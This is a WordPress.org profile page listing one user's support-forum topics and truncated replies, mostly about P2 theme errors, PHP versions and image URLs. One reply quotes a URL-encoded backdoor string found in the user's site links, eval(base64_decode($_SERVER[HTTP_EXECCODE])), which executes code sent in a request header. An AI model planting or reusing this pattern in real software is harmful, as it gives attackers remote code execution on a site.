WordPress.org

Ready to get started?Download WordPress

Profiles

warebloke

Profile picture of warebloke
  • Member Since: May 13th, 2009
  • Posted a reply to "Disable a custom field", on the site WordPress Support Forums:
    the current theme is Puretype and is using it to display the old thumbnails actually…

    4 years ago

  • Created a topic, Disable a custom field, on the site WordPress Support Forums

    4 years ago

  • Posted a reply to "P2 theme showing Deprecated error since updating from PHP 5.2 to PHP 5.3", on the site WordPress Support Forums:
    fixed it, was not on latest WP

    5 years ago

  • Created a topic, P2 theme showing Deprecated error since updating from PHP 5.2 to PHP 5.3, on the site WordPress Support Forums

    5 years ago

  • Created a topic, Display feeds in header, on the site WordPress Support Forums

    5 years ago

  • Posted a reply to "Saving Code in sidebar widget adds "\" everywhere", on the site WordPress Support Forums:
    Has no-one else had this trouble, looks like a magic quotes issue but can not…

    5 years ago

  • Posted a reply to "Saving Code in sidebar widget adds "\" everywhere", on the site WordPress Support Forums:
    I have deactivated all plugins and still have the same problem, anyone offer any advice?…

    5 years ago

  • Created a topic, Saving Code in sidebar widget adds "\" everywhere, on the site WordPress Support Forums

    5 years ago

  • Posted a reply to "Image URL not correct", on the site WordPress Support Forums:
    Ok I fixed it crudely, simply moved the storage folder of images - and named…

    5 years ago

  • Created a topic, Image URL not correct, on the site WordPress Support Forums

    5 years ago

  • Posted a reply to "None of my users are found", on the site WordPress Support Forums:
    I found the issue - thanks for asking. It was a database error within phpmyadmin,…

    5 years ago

  • Created a topic, None of my users are found, on the site WordPress Support Forums

    5 years ago

  • Posted a reply to "WP adding code to the end of url links breaking them", on the site WordPress Support Forums:
    This just started to happen on our site today too /%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%/ Is not a hack…

    5 years ago

  • Created a topic, No Reply Link When Comments Not Nested in P2, on the site WordPress Support Forums

    5 years ago

  • Posted a reply to "P2 Theme with a fatal error - worked initially ok?", on the site WordPress Support Forums:
    I managed to fix this by simply changing the PHP version from 4 to 5.…

    5 years ago

  • Posted a reply to "Fatal Error in P2 - line 352", on the site WordPress Support Forums:
    It was using PHP 4 on Media Temple, changed it to PHP 5 and hey…

    5 years ago

  • Posted a reply to "P2 Theme with a fatal error - worked initially ok?", on the site WordPress Support Forums:
    It may also help to add that there are zero plugins on this theme

    5 years ago

  • Posted a reply to "P2 Theme with a fatal error - worked initially ok?", on the site WordPress Support Forums:
    This is still not solved guys, thanks

    5 years ago

  • Created a topic, P2 Theme with a fatal error - worked initially ok?, on the site WordPress Support Forums

    5 years ago

  • Posted a reply to "Fatal Error in P2 - line 352", on the site WordPress Support Forums:
    I just re-installed WP to check if that was the problem, but nothing changed. Any…

    5 years ago

  • Created a topic, Fatal Error in P2 - line 352, on the site WordPress Support Forums

    5 years ago